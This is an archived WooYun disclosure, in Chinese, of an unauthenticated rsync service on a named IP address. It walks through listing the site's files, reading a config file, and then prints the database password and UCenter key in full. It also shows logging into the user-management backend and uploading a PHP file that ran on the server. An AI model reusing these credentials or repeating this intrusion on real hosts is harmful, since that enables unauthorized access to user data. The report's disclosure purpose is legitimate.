乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-25: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-12-09: 厂商已经主动忽略漏洞,细节向公众公开
rsync配置不当导致数据泄漏
118.144.94.98配置了rsync的服务,但是没有身份认证就可以直接访问。rsync 118.144.94.98::www尝试rsync网站内容到本地成功
rsync 118.144.94.98::www/love/drwxrwxrwx 4096 2013/10/25 16:08:46 .-rwxr-xr-x 2596 2011/10/11 09:48:42 admin.php-rwxr-xr-x 741 2011/10/11 09:48:42 api.php-rwxr-xr-x 877 2011/10/11 09:48:42 connect.php-rwxr-xr-x 253 2011/10/11 09:48:42 cp.php-rwxr-xr-x 106 2011/10/11 09:48:42 crossdomain.xml-rwxr-xr-x 5558 2011/10/11 09:48:42 favicon.ico-rwxr-xr-x 2112 2011/10/11 09:48:42 forum.php-rwxr-xr-x 883 2011/10/11 09:48:42 group.php-rwxr-xr-x 1096 2011/10/11 09:48:42 home.php-rwxr-xr-x 5517 2011/10/11 09:48:42 index8.php-rwxr-xr-x 956 2011/10/11 09:48:42 member.php-rwxr-xr-x 1355 2011/10/11 09:48:42 misc.php-rwxr-xr-x 1731 2011/10/11 09:48:42 plugin.php-rwxr-xr-x 1077 2011/10/11 09:48:42 portal.php-rwxr-xr-x 582 2011/10/11 09:48:42 robots.txt-rwxr-xr-x 1192 2011/10/11 09:48:42 search.php-rwxr-xr-x 1706 2011/10/11 09:48:42 userapp.phpdrwxr-xr-x 4096 2011/12/02 15:42:36 apidrwxr-xr-x 4096 2011/12/02 15:42:36 archiverdrwxr-xr-x 4096 2011/12/02 15:44:56 configdrwxr-xr-x 4096 2011/12/04 19:46:44 datadrwxr-xr-x 4096 2011/12/02 16:11:56 installdrwxr-xr-x 4096 2013/10/25 16:08:09 iphonedrwxr-xr-x 4096 2012/07/11 18:51:06 mysqldrwxr-xr-x 4096 2011/12/02 15:42:36 sourcedrwxr-xr-x 4096 2011/12/02 15:42:36 staticdrwxr-xr-x 4096 2011/12/02 15:42:38 templatedrwxr-xr-x 4096 2011/12/02 15:42:40 uc_clientdrwxr-xr-x 4096 2011/12/02 15:42:40 uc_server
发现有大量用户上传图片存放
rsync 118.144.94.98::www/love/data/attachment/album/drwxr-xr-x 4096 2013/10/01 17:26:03 .-rwxr-xr-x 0 2011/10/11 09:48:42 index.htmdrwxr-xr-x 4096 2012/03/12 13:52:25 201203drwxr-xr-x 4096 2012/04/27 11:02:15 201204drwxr-xr-x 4096 2012/05/31 12:04:35 201205drwxr-xr-x 4096 2012/06/30 01:10:05 201206drwxr-xr-x 4096 2012/07/31 00:21:19 201207drwxr-xr-x 4096 2012/08/31 01:31:38 201208drwxr-xr-x 4096 2012/09/30 05:21:14 201209drwxr-xr-x 4096 2012/10/31 00:03:06 201210drwxr-xr-x 4096 2012/11/30 03:32:52 201211drwxr-xr-x 4096 2012/12/31 00:00:20 201212drwxr-xr-x 4096 2013/01/31 00:00:04 201301drwxr-xr-x 4096 2013/02/28 00:48:00 201302drwxr-xr-x 4096 2013/03/31 01:02:25 201303drwxr-xr-x 4096 2013/04/30 00:40:11 201304drwxr-xr-x 4096 2013/05/31 00:26:16 201305drwxr-xr-x 4096 2013/06/30 01:06:31 201306drwxr-xr-x 4096 2013/07/31 00:06:46 201307drwxr-xr-x 4096 2013/08/31 00:48:07 201308drwxr-xr-x 4096 2013/09/30 04:10:57 201309drwxr-xr-x 4096 2013/10/25 09:33:43 201310drwxr-xr-x 4096 2012/03/05 14:04:10 cover
看配置文件发现数据库密码是adoado
<?phpdefine('UC_CONNECT', 'mysql');define('UC_DBHOST', 'localhost');define('UC_DBUSER', 'love');define('UC_DBPW', 'adoado');define('UC_DBNAME', 'love');define('UC_DBCHARSET', 'utf8');define('UC_DBTABLEPRE', '`love`.pre_ucenter_');define('UC_DBCONNECT', 0);define('UC_CHARSET', 'utf-8');define('UC_KEY', '02EeJ5K2q7w775F8I91186tcz9fc9cE0Q0U9B19bQ0O8Vcg329a141b8R2x8Sf09');define('UC_API', 'http://api.qingrenjie.me:88/uc_server');define('UC_APPID', '1');define('UC_IP', '127.0.0.1');define('UC_PPP', 20);
尝试用这个密码登陆UCenterUCenter 统计信息应用总数:2用户总数:59563短消息数:0好友记录数:30通过rsync上传env.php成功执行可见
PHP Version 5.2.17p1System Linux SNDA-172-17-11-3 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64Build Date Jul 11 2012 16:13:37Configure Command './configure' '--prefix=/usr/local/php' '--with-config-file-path=/usr/local/php/etc' '--with-apxs2=/usr/local/apache/bin/apxs' '--with-mysql=/usr/local/mysql' '--with-mysqli=/usr/local/mysql/bin/mysql_config' '--with-iconv-dir' '--with-freetype-dir' '--with-jpeg-dir' '--with-png-dir' '--with-zlib' '--with-libxml-dir=/usr' '--enable-xml' '--disable-rpath' '--enable-discard-path' '--enable-magic-quotes' '--enable-safe-mode' '--enable-bcmath' '--enable-shmop' '--enable-sysvsem' '--enable-inline-optimization' '--with-curl' '--with-curlwrappers' '--enable-mbregex' '--enable-mbstring' '--with-mcrypt' '--enable-ftp' '--with-gd' '--enable-gd-native-ttf' '--with-openssl' '--with-mhash' '--enable-pcntl' '--enable-sockets' '--with-xmlrpc' '--enable-zip' '--enable-soap' '--without-pear' '--with-gettext' '--with-mime-magic'Server API Apache 2.0 HandlerVirtual Directory Support disabledConfiguration File (php.ini) Path /usr/local/php/etcLoaded Configuration File /usr/local/php/etc/php.ini
渗透结束
rsync必须有身份认证
未能联系到厂商或者厂商积极拒绝